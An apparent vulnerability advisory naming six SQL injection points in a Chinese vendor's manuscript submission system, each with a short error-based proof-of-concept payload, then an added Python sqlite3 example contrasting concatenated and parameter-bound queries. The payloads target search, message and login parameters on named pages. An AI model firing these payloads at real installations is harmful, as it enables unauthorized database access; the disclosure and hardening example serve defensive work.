Multiple SQL injection vulnerabilities in a general manuscript submission system (collected)
Google Keyword: technical support: Nanjing jienuhan Software Technology Co., Ltd.
Its manuscript submission system has multiple SQL injection vulnerabilities, which are collected here:
======================================================================
Injection Point 1: /KeySearch.aspx  parameter: title  POC: 'AND 1 = convert (int, (@ version) +'
Injection Point 2: /KeySearch.aspx  parameter: author  POC: 'AND 1 = convert (int, (@ version) +'
Injection Point 3: /KeySearch.aspx  parameter: keyword  POC: 'AND 1 = convert (int, (@ version) +'
Injection Point 4: /liuyan.aspx  parameter: LinkTel  POC: '+ convert (int, (@ version) +'
Injection Point 5: /liuyan.aspx  parameter: Mail  POC: '+ convert (int, (@ version) +'
Injection Point 6: /Login.aspx  parameter: username  POC: '+ (select convert (int, (@ version) FROM syscolumns) +'
Solution:
Filter the input to the affected parameters.
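
An added example, not part of the original advisory and not the vendor's code: the same search written with string concatenation and with a bound parameter, fed the title POC string exactly as printed above. Python's sqlite3 stands in for the application's database, and the table, columns and rows are hypothetical, constructed for the demonstration.

```python
import sqlite3

# The title/author/keyword POC string exactly as printed on this page.
PAGE_POC = "'AND 1 = convert (int, (@ version) +'"


def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE manuscripts (title TEXT, author TEXT, keyword TEXT)")
    db.executemany(
        "INSERT INTO manuscripts VALUES (?, ?, ?)",
        [("Soil survey methods", "Li", "soil"),
         ("O'Neill cylinders", "Chen", "space")],
    )
    return db


def search_concat(db, title):
    # Vulnerable pattern: the parameter is spliced into the statement text,
    # so a quote in the input ends the string literal and the rest is parsed as SQL.
    sql = "SELECT title FROM manuscripts WHERE title LIKE '%" + title + "%'"
    return [row[0] for row in db.execute(sql)]


def search_bound(db, title):
    # Hardened pattern: the statement text is fixed and the value is bound,
    # so the database never parses the input as SQL.
    sql = "SELECT title FROM manuscripts WHERE title LIKE '%' || ? || '%'"
    return [row[0] for row in db.execute(sql, (title,))]


def reaches_parser(db, value):
    # True when the database rejects the spliced statement, which means the
    # input was interpreted as SQL rather than as a search term.
    try:
        search_concat(db, value)
    except sqlite3.Error:
        return True
    return False
```

The bound version also handles a legitimate title containing an apostrophe, which the concatenated version rejects and which a filter that strips quotes would mangle.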